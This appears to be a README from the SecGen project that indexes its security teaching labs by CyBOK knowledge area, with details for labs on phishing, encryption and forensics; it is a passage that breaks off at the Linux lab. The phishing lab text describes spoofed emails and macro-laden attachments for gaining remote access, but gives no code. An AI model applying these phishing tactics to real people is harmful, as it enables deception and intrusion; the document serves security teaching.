Skip to content

Latest commit

 

History

History
3646 lines (2298 loc) · 233 KB

README-CyBOK-Scenarios-Indexed.md

File metadata and controls

3646 lines (2298 loc) · 233 KB

Lab Scenarios and CyBOK

The Cyber Security Body of Knowledge (CyBOK) is a body of knowledge that aims to encapsulate the various knowledge areas present within cyber security. Scenarios within SecGen now contain XML elements linking them to CyBOK knowledge areas and specific topics within those knowledge areas. Additionally, video lectures for scenarios are tagged with CyBOK associations.

This file is an autogenerated index and cross referencing of the 118 SecGen practical lab scenarios that have CyBOK metadata.

You can browse the list below in terms of the CyBOK Knowledge Areas, and Topics. The list of scenarios in the second half of this document includes keywords (also known as "indicative topics" in CyBOK terminology).

The all lowercase topics and keywords are provided by NCSC for CyBOK mapping, while all caps indicates it is taken from the CyBOK mapping reference, mixed case keywords are ones that we have added.

Cyber Security Body of Knowledge (CyBOK) Issue 1.1 is Crown Copyright, The National Cyber Security Centre 2021, licensed under the Open Government Licence http://www.nationalarchives.gov.uk/doc/open-government-licence/.

Scenarios Indexed By CyBOK Knowledge Area (KA)

Human Factors (HF)
Adversarial Behaviours (AB)
Malware & Attack Technology (MAT)
Web & Mobile Security (WAM)
Applied Cryptography (AC)
Forensics (F)
Privacy & Online Rights (POR)
Network Security (NS)
Security Operations & Incident Management (SOIM)
Software Security (SS)
Authentication, Authorisation & Accountability (AAA)
Operating Systems & Virtualisation (OSV)
Cyber-Physical Systems Security (CPS)

Human Factors (HF)

HF Scenarios

cyber_security_landscape/3_phishing.xml

HF Scenarios by Topics

Topic Scenario
Human Error cyber_security_landscape/3_phishing.xml

Adversarial Behaviours (AB)

AB Scenarios

cyber_security_landscape/3_phishing.xml
introducing_attacks/4_dns_footprinting.xml
introducing_attacks/5_scanning.xml
introducing_attacks/6_exploitation.xml
introducing_attacks/7_post-exploitation.xml
labtainers/grfics.xml

AB Scenarios by Topics

Topic Scenario
Attacks cyber_security_landscape/3_phishing.xml
Models introducing_attacks/4_dns_footprinting.xml
introducing_attacks/5_scanning.xml
introducing_attacks/6_exploitation.xml
introducing_attacks/7_post-exploitation.xml
labtainers/grfics.xml

Malware & Attack Technology (MAT)

MAT Scenarios

cyber_security_landscape/3_phishing.xml
introducing_attacks/2_malware_msf_payloads.xml
introducing_attacks/3_vulnerabilities.xml
introducing_attacks/4_dns_footprinting.xml
introducing_attacks/5_scanning.xml
introducing_attacks/6_exploitation.xml
introducing_attacks/7_post-exploitation.xml
introducing_attacks/8_vulnerability_analysis.xml
labtainers/acl-hackerbot-flags.xml
labtainers/acl.xml
labtainers/bufoverflow.xml
labtainers/formatstring.xml
labtainers/gdblesson.xml
labtainers/ida.xml
labtainers/metasploit.xml
labtainers/retlibc.xml
labtainers/snort.xml
response_and_investigation/4_ids.xml
response_and_investigation/5_ids_rules.xml
response_and_investigation/7_live_analysis.xml
response_and_investigation/8_dead_analysis.xml
software_and_malware_analysis/10_anti_sre.xml
software_and_malware_analysis/11_coconut.xml
software_and_malware_analysis/1_dynamic_and_static_analysis.xml
software_and_malware_analysis/2_intro_to_c.xml
software_and_malware_analysis/3_c_and_asm.xml
software_and_malware_analysis/4_asm.xml
software_and_malware_analysis/5_ghidra.xml
software_and_malware_analysis/6_ghidra_analysis.xml
software_and_malware_analysis/6_ghidra_with_live_malware_samples.xml
software_and_malware_analysis/7_dynamic.xml
software_and_malware_analysis/8_dynamic_continued.xml
software_and_malware_analysis/9_malware_behaviour.xml
software_security_exploitation/4_exploit_development.xml
software_security_exploitation/5_linux_stack_bof.xml
software_security_exploitation/6_linux_nx_bypass.xml
software_security_exploitation/7_linux_aslr_bypass.xml
software_security_exploitation/8_linux_bof_format.xml

MAT Scenarios by Topics

Topic Scenario
Attacks and exploitation cyber_security_landscape/3_phishing.xml
introducing_attacks/2_malware_msf_payloads.xml
introducing_attacks/3_vulnerabilities.xml
introducing_attacks/6_exploitation.xml
introducing_attacks/7_post-exploitation.xml
introducing_attacks/8_vulnerability_analysis.xml
labtainers/bufoverflow.xml
labtainers/formatstring.xml
labtainers/metasploit.xml
labtainers/retlibc.xml
software_security_exploitation/4_exploit_development.xml
software_security_exploitation/5_linux_stack_bof.xml
software_security_exploitation/6_linux_nx_bypass.xml
software_security_exploitation/7_linux_aslr_bypass.xml
software_security_exploitation/8_linux_bof_format.xml
Malware Taxonomy introducing_attacks/2_malware_msf_payloads.xml
software_and_malware_analysis/11_coconut.xml
software_and_malware_analysis/1_dynamic_and_static_analysis.xml
software_and_malware_analysis/9_malware_behaviour.xml
Malware Analysis introducing_attacks/2_malware_msf_payloads.xml
labtainers/gdblesson.xml
labtainers/ida.xml
software_and_malware_analysis/10_anti_sre.xml
software_and_malware_analysis/11_coconut.xml
software_and_malware_analysis/1_dynamic_and_static_analysis.xml
software_and_malware_analysis/3_c_and_asm.xml
software_and_malware_analysis/4_asm.xml
software_and_malware_analysis/5_ghidra.xml
software_and_malware_analysis/6_ghidra_analysis.xml
software_and_malware_analysis/6_ghidra_with_live_malware_samples.xml
software_and_malware_analysis/7_dynamic.xml
software_and_malware_analysis/8_dynamic_continued.xml
software_and_malware_analysis/9_malware_behaviour.xml
Malicious Activities by Malware introducing_attacks/4_dns_footprinting.xml
introducing_attacks/5_scanning.xml
introducing_attacks/6_exploitation.xml
introducing_attacks/7_post-exploitation.xml
labtainers/metasploit.xml
MALCODE/MALWARE labtainers/acl-hackerbot-flags.xml
labtainers/acl.xml
Malware Detection labtainers/snort.xml
response_and_investigation/4_ids.xml
response_and_investigation/5_ids_rules.xml
response_and_investigation/7_live_analysis.xml
response_and_investigation/8_dead_analysis.xml
Technical Underpinning software_and_malware_analysis/2_intro_to_c.xml
software_and_malware_analysis/3_c_and_asm.xml

Web & Mobile Security (WAM)

WAM Scenarios

cyber_security_landscape/3_phishing.xml
cyber_security_landscape/4_encoding_encryption.xml
labtainers/iptables-ics.xml
labtainers/iptables.xml
labtainers/iptables2.xml
labtainers/sql-inject.xml
labtainers/webtrack.xml
labtainers/xforge.xml
labtainers/xsite.xml
systems_security/7_containers.xml
web_security/1_intro_web_security.xml
web_security/2_sessions_and_cookies.xml
web_security/3_xss.xml
web_security/4_sqli.xml
web_security/5_sqli_advanced.xml
web_security/6_csrf.xml
web_security/7_additional_web.xml
web_security/websec_lab.xml

WAM Scenarios by Topics

Topic Scenario
Client-Side Vulnerabilities and Mitigations cyber_security_landscape/3_phishing.xml
web_security/2_sessions_and_cookies.xml
web_security/3_xss.xml
web_security/6_csrf.xml
web_security/7_additional_web.xml
web_security/websec_lab.xml
Fundamental Concepts and Approaches cyber_security_landscape/4_encoding_encryption.xml
labtainers/webtrack.xml
systems_security/7_containers.xml
web_security/1_intro_web_security.xml
web_security/2_sessions_and_cookies.xml
web_security/3_xss.xml
web_security/4_sqli.xml
web_security/5_sqli_advanced.xml
web_security/6_csrf.xml
web_security/7_additional_web.xml
web_security/websec_lab.xml
FIREWALLS labtainers/iptables-ics.xml
labtainers/iptables.xml
labtainers/iptables2.xml
web_security/7_additional_web.xml
web_security/websec_lab.xml
Server-Side Vulnerabilities and Mitigations labtainers/sql-inject.xml
labtainers/xforge.xml
labtainers/xsite.xml
web_security/1_intro_web_security.xml
web_security/2_sessions_and_cookies.xml
web_security/3_xss.xml
web_security/4_sqli.xml
web_security/5_sqli_advanced.xml
web_security/6_csrf.xml
web_security/7_additional_web.xml
web_security/websec_lab.xml

Applied Cryptography (AC)

AC Scenarios

cyber_security_landscape/4_encoding_encryption.xml
cyber_security_landscape/6_symmetric_enc_aes.xml
cyber_security_landscape/7_asymmetric_enc_rsa.xml
labtainers/macs-hash.xml
labtainers/onewayhash.xml
labtainers/pubkey.xml
labtainers/ssh-agent.xml
labtainers/sshlab.xml
labtainers/ssl.xml
labtainers/symkeylab.xml

AC Scenarios by Topics

Topic Scenario
Algorithms, Schemes and Protocols cyber_security_landscape/4_encoding_encryption.xml
cyber_security_landscape/6_symmetric_enc_aes.xml
cyber_security_landscape/7_asymmetric_enc_rsa.xml
labtainers/pubkey.xml
labtainers/symkeylab.xml
Symmetric Cryptography cyber_security_landscape/6_symmetric_enc_aes.xml
labtainers/symkeylab.xml
Cryptographic Implementation cyber_security_landscape/6_symmetric_enc_aes.xml
cyber_security_landscape/7_asymmetric_enc_rsa.xml
Public-Key Cryptography cyber_security_landscape/7_asymmetric_enc_rsa.xml
labtainers/macs-hash.xml
labtainers/onewayhash.xml
labtainers/ssh-agent.xml
labtainers/sshlab.xml
labtainers/ssl.xml
Key Management cyber_security_landscape/7_asymmetric_enc_rsa.xml

Forensics (F)

F Scenarios

cyber_security_landscape/4_encoding_encryption.xml
forensics/trashed_evidence.xml
labtainers/file-deletion.xml
labtainers/file-integrity.xml
labtainers/macs-hash.xml
labtainers/onewayhash.xml
labtainers/packet-introspection.xml
labtainers/pass-crack.xml
labtainers/pcapanalysis.xml
labtainers/webtrack.xml
response_and_investigation/2_integrity_detection.xml
response_and_investigation/6_exfiltration_detection.xml
response_and_investigation/7_live_analysis.xml
response_and_investigation/8_dead_analysis.xml
web_security/7_additional_web.xml
web_security/websec_lab.xml

F Scenarios by Topics

Topic Scenario
Artifact Analysis cyber_security_landscape/4_encoding_encryption.xml
labtainers/macs-hash.xml
labtainers/onewayhash.xml
labtainers/pass-crack.xml
response_and_investigation/2_integrity_detection.xml
response_and_investigation/6_exfiltration_detection.xml
Operating System Analysis forensics/trashed_evidence.xml
labtainers/file-deletion.xml
labtainers/file-integrity.xml
response_and_investigation/8_dead_analysis.xml
Application Forensics forensics/trashed_evidence.xml
Main Memory Forensics labtainers/packet-introspection.xml
labtainers/pcapanalysis.xml
response_and_investigation/7_live_analysis.xml
web_security/7_additional_web.xml
web_security/websec_lab.xml
WEB labtainers/webtrack.xml

Privacy & Online Rights (POR)

POR Scenarios

forensics/trashed_evidence.xml

POR Scenarios by Topics

Topic Scenario
Privacy Technologies and Democratic Values forensics/trashed_evidence.xml

Network Security (NS)

NS Scenarios

introducing_attacks/1_intro_linux.xml
introducing_attacks/4_dns_footprinting.xml
introducing_attacks/5_scanning.xml
labtainers/arp-spoof.xml
labtainers/denyhost.xml
labtainers/dmz-example.xml
labtainers/dmz-lab.xml
labtainers/grfics.xml
labtainers/iptables-ics.xml
labtainers/iptables.xml
labtainers/iptables2.xml
labtainers/local-dns.xml
labtainers/nix-commands.xml
labtainers/nmap-discovery.xml
labtainers/nmap-ssh.xml
labtainers/pcapanalysis.xml
labtainers/pubkey.xml
labtainers/radius.xml
labtainers/remote-dns.xml
labtainers/routing-basics.xml
labtainers/routing-basics2.xml
labtainers/snort.xml
labtainers/tcpip.xml
labtainers/telnetlab.xml
labtainers/vpnlab.xml
labtainers/vpnlab2.xml
response_and_investigation/4_ids.xml
response_and_investigation/5_ids_rules.xml
response_and_investigation/6_exfiltration_detection.xml
web_security/7_additional_web.xml
web_security/websec_lab.xml

NS Scenarios by Topics

Topic Scenario
Network Protocols and Vulnerability introducing_attacks/1_intro_linux.xml
labtainers/arp-spoof.xml
labtainers/local-dns.xml
labtainers/remote-dns.xml
labtainers/tcpip.xml
PENETRATION TESTING introducing_attacks/4_dns_footprinting.xml
introducing_attacks/5_scanning.xml
labtainers/nix-commands.xml
labtainers/nmap-discovery.xml
labtainers/nmap-ssh.xml
Network Defence Tools labtainers/denyhost.xml
labtainers/dmz-example.xml
labtainers/dmz-lab.xml
labtainers/grfics.xml
labtainers/iptables-ics.xml
labtainers/iptables.xml
labtainers/iptables2.xml
labtainers/snort.xml
labtainers/vpnlab.xml
labtainers/vpnlab2.xml
response_and_investigation/4_ids.xml
response_and_investigation/5_ids_rules.xml
response_and_investigation/6_exfiltration_detection.xml
web_security/7_additional_web.xml
web_security/websec_lab.xml
Internet Architecture labtainers/iptables-ics.xml
labtainers/iptables.xml
labtainers/iptables2.xml
labtainers/pubkey.xml
labtainers/radius.xml
labtainers/routing-basics.xml
labtainers/routing-basics2.xml
labtainers/tcpip.xml
web_security/7_additional_web.xml
web_security/websec_lab.xml
OSI (OPEN SYSTEM INTERCONNECT) MODEL labtainers/pcapanalysis.xml
REMOTE ACCESS labtainers/telnetlab.xml
TCP/IP labtainers/telnetlab.xml

Security Operations & Incident Management (SOIM)

SOIM Scenarios

introducing_attacks/1_intro_linux.xml
introducing_attacks/2_malware_msf_payloads.xml
introducing_attacks/3_vulnerabilities.xml
introducing_attacks/4_dns_footprinting.xml
introducing_attacks/5_scanning.xml
introducing_attacks/6_exploitation.xml
introducing_attacks/7_post-exploitation.xml
introducing_attacks/8_vulnerability_analysis.xml
labtainers/arp-spoof.xml
labtainers/backups.xml
labtainers/backups2.xml
labtainers/capabilities.xml
labtainers/centos-log.xml
labtainers/centos-log2.xml
labtainers/denyhost.xml
labtainers/file-integrity.xml
labtainers/grassmarlin.xml
labtainers/ldap.xml
labtainers/metasploit.xml
labtainers/nmap-ssh.xml
labtainers/packet-introspection.xml
labtainers/pcapanalysis.xml
labtainers/snort.xml
labtainers/sys-log.xml
labtainers/wireshark-intro.xml
response_and_investigation/2_integrity_detection.xml
response_and_investigation/3_backups_and_recovery.xml
response_and_investigation/4_ids.xml
response_and_investigation/5_ids_rules.xml
response_and_investigation/6_exfiltration_detection.xml
response_and_investigation/9_siem.xml
web_security/7_additional_web.xml
web_security/websec_lab.xml

SOIM Scenarios by Topics

Topic Scenario
PENETRATION TESTING introducing_attacks/1_intro_linux.xml
introducing_attacks/2_malware_msf_payloads.xml
introducing_attacks/3_vulnerabilities.xml
introducing_attacks/4_dns_footprinting.xml
introducing_attacks/5_scanning.xml
introducing_attacks/6_exploitation.xml
introducing_attacks/7_post-exploitation.xml
introducing_attacks/8_vulnerability_analysis.xml
labtainers/metasploit.xml
Monitor: Data Sources labtainers/arp-spoof.xml
labtainers/capabilities.xml
labtainers/centos-log.xml
labtainers/centos-log2.xml
labtainers/file-integrity.xml
labtainers/grassmarlin.xml
labtainers/ldap.xml
labtainers/packet-introspection.xml
labtainers/pcapanalysis.xml
labtainers/snort.xml
labtainers/sys-log.xml
labtainers/wireshark-intro.xml
response_and_investigation/2_integrity_detection.xml
response_and_investigation/4_ids.xml
response_and_investigation/5_ids_rules.xml
response_and_investigation/6_exfiltration_detection.xml
response_and_investigation/9_siem.xml
web_security/7_additional_web.xml
web_security/websec_lab.xml
Execute: Mitigation and Countermeasures labtainers/backups.xml
labtainers/backups2.xml
labtainers/denyhost.xml
labtainers/snort.xml
response_and_investigation/3_backups_and_recovery.xml
response_and_investigation/4_ids.xml
response_and_investigation/9_siem.xml
INCIDENT RESPONSE labtainers/backups.xml
labtainers/backups2.xml
CM (CONFIGURATION MANAGEMENT) labtainers/denyhost.xml
labtainers/nmap-ssh.xml
Analyse: Analysis Methods labtainers/snort.xml
response_and_investigation/4_ids.xml
response_and_investigation/5_ids_rules.xml
response_and_investigation/6_exfiltration_detection.xml
response_and_investigation/9_siem.xml
Fundamental Concepts response_and_investigation/9_siem.xml
Plan: Security Information and Event Management response_and_investigation/9_siem.xml

Software Security (SS)

SS Scenarios

introducing_attacks/6_exploitation.xml
labtainers/bufoverflow.xml
labtainers/formatstring.xml
labtainers/pass-crack.xml
labtainers/retlibc.xml
labtainers/sql-inject.xml
labtainers/xforge.xml
labtainers/xsite.xml
software_security_exploitation/1_c_asm_iof.xml
software_security_exploitation/2_race_conditions_format_str.xml
software_security_exploitation/3_bug_hunting_and_fuzzing.xml
software_security_exploitation/4_exploit_development.xml
software_security_exploitation/5_linux_stack_bof.xml
software_security_exploitation/6_linux_nx_bypass.xml
software_security_exploitation/7_linux_aslr_bypass.xml
software_security_exploitation/8_linux_bof_format.xml
systems_security/8_apparmor.xml
web_security/1_intro_web_security.xml
web_security/2_sessions_and_cookies.xml
web_security/3_xss.xml
web_security/4_sqli.xml
web_security/5_sqli_advanced.xml
web_security/6_csrf.xml
web_security/7_additional_web.xml
web_security/websec_lab.xml

SS Scenarios by Topics

Topic Scenario
Categories of Vulnerabilities introducing_attacks/6_exploitation.xml
labtainers/bufoverflow.xml
labtainers/formatstring.xml
labtainers/retlibc.xml
labtainers/sql-inject.xml
software_security_exploitation/1_c_asm_iof.xml
software_security_exploitation/2_race_conditions_format_str.xml
software_security_exploitation/4_exploit_development.xml
software_security_exploitation/5_linux_stack_bof.xml
software_security_exploitation/6_linux_nx_bypass.xml
software_security_exploitation/7_linux_aslr_bypass.xml
software_security_exploitation/8_linux_bof_format.xml
web_security/1_intro_web_security.xml
web_security/2_sessions_and_cookies.xml
web_security/3_xss.xml
web_security/4_sqli.xml
web_security/5_sqli_advanced.xml
web_security/6_csrf.xml
web_security/7_additional_web.xml
web_security/websec_lab.xml
Mitigating Exploitation labtainers/bufoverflow.xml
labtainers/retlibc.xml
software_security_exploitation/6_linux_nx_bypass.xml
software_security_exploitation/7_linux_aslr_bypass.xml
systems_security/8_apparmor.xml
Authentication labtainers/pass-crack.xml
Prevention of Vulnerabilities labtainers/sql-inject.xml
labtainers/xforge.xml
labtainers/xsite.xml
software_security_exploitation/1_c_asm_iof.xml
software_security_exploitation/2_race_conditions_format_str.xml
web_security/3_xss.xml
web_security/4_sqli.xml
web_security/5_sqli_advanced.xml
web_security/6_csrf.xml
web_security/7_additional_web.xml
web_security/websec_lab.xml
Detection of Vulnerabilities software_security_exploitation/3_bug_hunting_and_fuzzing.xml
web_security/1_intro_web_security.xml
web_security/2_sessions_and_cookies.xml
web_security/3_xss.xml
web_security/4_sqli.xml
web_security/5_sqli_advanced.xml
web_security/6_csrf.xml
web_security/7_additional_web.xml
web_security/websec_lab.xml

Authentication, Authorisation & Accountability (AAA)

AAA Scenarios

labtainers/acl-hackerbot-flags.xml
labtainers/acl.xml
labtainers/file-integrity.xml
labtainers/ldap.xml
labtainers/macs-hash.xml
labtainers/nix-commands.xml
labtainers/onewayhash.xml
labtainers/radius.xml
labtainers/setuid-env.xml
response_and_investigation/1_integrity_protection.xml
response_and_investigation/7_live_analysis.xml
response_and_investigation/8_dead_analysis.xml
systems_security/1_authentication.xml
systems_security/2_pam.xml
systems_security/4_access_controls.xml
systems_security/5_suid.xml
systems_security/6_facls.xml
systems_security/7_containers.xml
systems_security/8_apparmor.xml

AAA Scenarios by Topics

Topic Scenario
Authorisation labtainers/acl-hackerbot-flags.xml
labtainers/acl.xml
labtainers/ldap.xml
labtainers/nix-commands.xml
labtainers/setuid-env.xml
response_and_investigation/1_integrity_protection.xml
systems_security/4_access_controls.xml
systems_security/5_suid.xml
systems_security/6_facls.xml
systems_security/7_containers.xml
systems_security/8_apparmor.xml
Authentication labtainers/file-integrity.xml
labtainers/ldap.xml
labtainers/macs-hash.xml
labtainers/onewayhash.xml
labtainers/radius.xml
systems_security/1_authentication.xml
systems_security/2_pam.xml
Accountability response_and_investigation/7_live_analysis.xml
response_and_investigation/8_dead_analysis.xml

Operating Systems & Virtualisation (OSV)

OSV Scenarios

labtainers/acl-hackerbot-flags.xml
labtainers/acl.xml
labtainers/capabilities.xml
labtainers/setuid-env.xml
response_and_investigation/1_integrity_protection.xml
response_and_investigation/2_integrity_detection.xml
response_and_investigation/7_live_analysis.xml
systems_security/1_authentication.xml
systems_security/2_pam.xml
systems_security/4_access_controls.xml
systems_security/5_suid.xml
systems_security/6_facls.xml
systems_security/7_containers.xml
systems_security/8_apparmor.xml

OSV Scenarios by Topics

Topic Scenario
Primitives for Isolation and Mediation labtainers/acl-hackerbot-flags.xml
labtainers/acl.xml
labtainers/capabilities.xml
labtainers/setuid-env.xml
response_and_investigation/1_integrity_protection.xml
systems_security/1_authentication.xml
systems_security/2_pam.xml
systems_security/4_access_controls.xml
systems_security/5_suid.xml
systems_security/6_facls.xml
systems_security/7_containers.xml
systems_security/8_apparmor.xml
Role of Operating Systems labtainers/acl-hackerbot-flags.xml
labtainers/acl.xml
systems_security/4_access_controls.xml
systems_security/7_containers.xml
OS Hardening response_and_investigation/2_integrity_detection.xml
response_and_investigation/7_live_analysis.xml

Cyber-Physical Systems Security (CPS)

CPS Scenarios

labtainers/grassmarlin.xml
labtainers/grfics.xml
labtainers/iptables-ics.xml
labtainers/plc-app.xml
labtainers/plc-forensics-adv.xml
labtainers/plc-forensics.xml
labtainers/plc.xml
labtainers/softplc.xml
labtainers/softplc2.xml
labtainers/ssl.xml

CPS Scenarios by Topics

Topic Scenario
Cyber-Physical Systems labtainers/grassmarlin.xml
labtainers/grfics.xml
labtainers/iptables-ics.xml
labtainers/plc-app.xml
labtainers/plc-forensics-adv.xml
labtainers/plc-forensics.xml
labtainers/plc.xml
labtainers/softplc.xml
labtainers/softplc2.xml
labtainers/ssl.xml
Cyber-Physical Systems Domains labtainers/grassmarlin.xml
labtainers/grfics.xml
labtainers/iptables-ics.xml
labtainers/plc-app.xml
labtainers/plc-forensics-adv.xml
labtainers/plc-forensics.xml
labtainers/plc.xml
labtainers/softplc.xml
labtainers/softplc2.xml
labtainers/ssl.xml

Scenario CyBOK Keywords

cyber_security_landscape/3_phishing.xml

Details

Key Data
Name Let's Go Phishing
Description
Introduction
Humans play a crucial role in the cyber security of systems and information. Many attacks target users and their mental models of cyber security systems and risk. For example, if an attacker can trick a user into performing tasks for them, the attacker can achieve their goals and gain access that they are not authorised to. Human behavior often serves as both the first line of defense and the weakest link. This lab delves into the critical role humans play in safeguarding systems and information. It highlights the fact that even the most robust technical defenses can be compromised due to human error and deception. This lab primarily focuses on a pervasive cyber threat - phishing attacks. Phishing, an artful manipulation of human psychology, lures individuals into compromising security by tricking them into revealing sensitive information, clicking malicious links, or installing malware. Through this hands-on exercise, you will gain insights into how attackers exploit human vulnerabilities, learn the tactics used to craft convincing phishing emails, and explore techniques to create malicious attachments that can compromise a user's system.

In this lab, you will embark on a simulated cybersecurity mission within a fictitious organization. Your objective is to browse the organization's website to gather information on employees, email addresses, and their potential interests. You will then employ the tactics of engagement by sending targeted phishing emails to these individuals, using techniques such as spoofing emails, creating malicious attachments (executable programs, LibreOffice documents with macros), and more. As your victims respond to your emails, they will reveal why they trust or distrust your messages, providing invaluable feedback. The ultimate goal is to persuade these users to open the malicious attachments, granting you remote access to their systems. Your mission culminates in accessing the coveted "flag" files hidden in each victim's home directory, which you will submit as proof of your success. This lab offers a unique opportunity to understand how cybersecurity threats exploit human psychology, providing a practical foundation to enhance cyber awareness and strengthen defenses against these deceptive tactics.
Lab sheet https://docs.google.com/document/d/1Yb28GYRLD0Ihnb5oeFp-TGurhb8BZfm_qFbSSrGEknI/edit?usp=sharing
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names victim_server; kali

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Human Factors (HF) Human Error latent usability failures in systems-of-systems
Adversarial Behaviours (AB) Attacks SOCIAL ENGINEERING; MALICIOUS ACTIVITIES BY MALICIOUS ATTACHMENTS
Malware & Attack Technology (MAT) Attacks and exploitation EXPLOITATION FRAMEWORKS; MALCODE/MALWARE - SOCIAL ENGINEERING - BAITING; MALCODE/MALWARE - SOCIAL ENGINEERING - PRETEXTING; MALCODE/MALWARE - VIRUSES - COUNTERMEASUMALCODE/MALWARE - VIRUSES - MACRO VIRUSES; MALCODE/MALWARE - SPAM; MALCODE/MALWARE - SPOOFING
Web & Mobile Security (WAM) Client-Side Vulnerabilities and Mitigations E-MAIL - PHISHING; E-MAIL - SPOOFING

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/cyber_security_landscape/3_phishing.xml run

View source

cyber_security_landscape/4_encoding_encryption.xml

Details

Key Data
Name Encoding and Encryption Lab
Description
Introduction
Cryptography is a fundamental aspect of information security, enabling us to secure data from prying eyes and malicious actors. This hands-on lab will equip you with essential knowledge and skills related to encoding schemes, hash algorithms, and the use of tools like OpenSSL and Gnu Privacy Guard (GPG). You'll explore concepts like encoding data into different formats, encrypting and decrypting information, and managing keys. These skills are crucial for anyone interested in the field of cybersecurity, data protection, or simply understanding how secure communication works in the digital age.

Throughout the lab, you'll learn to encode strings into various formats, including hexadecimal and Base64. You'll experiment with symmetric key encryption using the Data Encryption Standard (DES) and the Advanced Encryption Standard (AES). Additionally, you'll explore public-key cryptography with GPG, creating and managing keys, encrypting and decrypting data, and understanding the importance of key pairs.

In the home directory of your VM there are a series of encoding and encryption CTF challenges for you to complete, to put your knowledge into practice.
Lab sheet https://docs.google.com/document/d/1wKm2c7yxhM-9GnAiS_Mgvk_8-H7FKEBeGeMc6H0KlwA/edit?usp=sharing
Type ctf-lab; hackerbot-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Applied Cryptography (AC) Algorithms, Schemes and Protocols Encoding vs Cryptography; Caesar cipher; Vigenere cipher; SYMMETRIC CRYPTOGRAPHY - AES (ADVANCED ENCRYPTION STANDARD)
Forensics (F) Artifact Analysis Encoding and alternative data formats
Web & Mobile Security (WAM) Fundamental Concepts and Approaches ENCODING; BASE64

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/cyber_security_landscape/4_encoding_encryption.xml run

View source

cyber_security_landscape/6_symmetric_enc_aes.xml

Details

Key Data
Name Symmetric Encryption with AES
Description
Symmetric encryption involves using the same key for both the encryption and decryption of data. In this lab, you will explore symmetric encryption with a focus on the Advanced Encryption Standard (AES). AES is a widely used block cipher that plays a crucial role in securing data in various applications, from secure communications to data protection. This lab aims to provide you with a high-level understanding of AES and its fundamental operations, such as Substitution (SubBytes), Permutation (ShiftRows and MixColumns), and Key Addition (Round Key). You will also explore how to work with AES encryption and decryption using both the GPG tool and Python3 with the Cryptodome module. This practical hands-on experience will equip you with the knowledge and skills necessary to apply AES encryption to secure your data.

Throughout this lab, you will have the opportunity to complete a series of tasks and challenges. These practical exercises will not only help you understand the underlying principles of AES but also equip you with the skills to apply this encryption technique to real-world scenarios, ensuring the security and confidentiality of your data.

This is a Hackerbot lab. The labsheet is available once you claim a set of VMs. Work through the labsheet, then when prompted interact with Hackerbot.
Type ctf-lab; hackerbot-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop; hb_server

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Applied Cryptography (AC) Algorithms, Schemes and Protocols ADVANCED ENCRYPTION STANDARD (AES); ECB (ELECTRONIC CODE BOOK) BLOCK CIPHER MODE
Applied Cryptography (AC) Symmetric Cryptography symmetric primitives; symmetric encryption and authentication
Applied Cryptography (AC) Cryptographic Implementation Cryptographic Libraries; ENCRYPTION - TOOLS

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/cyber_security_landscape/6_symmetric_enc_aes.xml run

View source

cyber_security_landscape/7_asymmetric_enc_rsa.xml

Details

Key Data
Name Asymmetric Encryption with RSA
Description
Public key cryptography (also known as asymmetric encryption) enables secure communication, digital signatures, and data encryption without the need for a shared secret key. In this lab you will delve into the world of public key cryptography, specifically focusing on the RSA (Rivest-Shamir-Adleman) cipher, one of the most widely used asymmetric encryption methods. This lab will help you understand the fundamental principles of RSA encryption, key pair generation, and encryption/decryption processes. You will also interact with Hackerbot, a chatbot designed to challenge and test your knowledge as you progress through the exercises.

Throughout this lab, you will learn the key concepts and procedures related to RSA encryption. You will start by generating RSA key pairs and performing encryption and decryption operations using both OpenSSL and Python. You will pick prime numbers, calculate modulus and phi(N), select encryption and decryption keys, and apply these concepts to encrypt and decrypt messages. The lab includes various Hackerbot challenges that you will complete, such as creating key pairs, encrypting and decrypting messages, and solving encryption-related quizzes. These practical exercises will deepen your understanding of RSA encryption and help you gain hands-on experience in using this cryptographic technique to secure information and communication.

This is a Hackerbot lab. The labsheet is available once you claim a set of VMs. Work through the labsheet, then when prompted interact with Hackerbot.
Type ctf-lab; hackerbot-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop; hb_server

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Applied Cryptography (AC) Algorithms, Schemes and Protocols CRYPTOGRAPHY - ASYMMETRIC - RSA; DIFFIE-HELLMAN ALGORITHM
Applied Cryptography (AC) Public-Key Cryptography public-key encryption; public-key signatures; RSA MODULUS; RSA PROBLEM; RSA TRANSFORM
Applied Cryptography (AC) Key Management key generation
Applied Cryptography (AC) Cryptographic Implementation Cryptographic Libraries; ENCRYPTION - TOOLS

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/cyber_security_landscape/7_asymmetric_enc_rsa.xml run

View source

forensics/trashed_evidence.xml

Details

Key Data
Name Digital Forensics: Trashed Evidence
Description
Introduction
Welcome to the world of digital forensics!

In this CTF problem-based learning task, you will be given a virtual machine (VM) representing a seized PC from an operative who works for an evil organization bent on global domination. Your task is to analyze the contents of the VM to gather evidence and identify any evidence of malicious activities on the machine.

In this task, you will be using digital forensics techniques to extract information from the VM, including files, and internet history, and and will involve retrieving deleted files and identifying and extracting data hidden using steganography.

These tasks will require a combination of technical skills, creativity, and critical thinking. With your help we can discover more about their evil plans!

The password to login is: tiaspbiqe2r
Type ctf-lab
Author Z. Cliffe Schreuders
VM names seized_desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Forensics (F) Operating System Analysis artifact analysis; Steganography; Encoding and alternative data formats; Deleted files; SEARCH FOR EVIDENCE; METADATA; data recovery and file content carving; storage forensics; data abstraction layers; application artifacts; data acquisition; encryption concerns; Hidden files
Forensics (F) Application Forensics APPLICATION ARTIFACTS; web browsers; url history; SEARCH FOR EVIDENCE; URL HISTORY; Command history; Database analysis
Privacy & Online Rights (POR) Privacy Technologies and Democratic Values METADATA; STEGANOGRAPHY

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/forensics/trashed_evidence.xml run

View source

introducing_attacks/1_intro_linux.xml

Details

Key Data
Name Introduction to Linux and Security lab
Description
Introduction
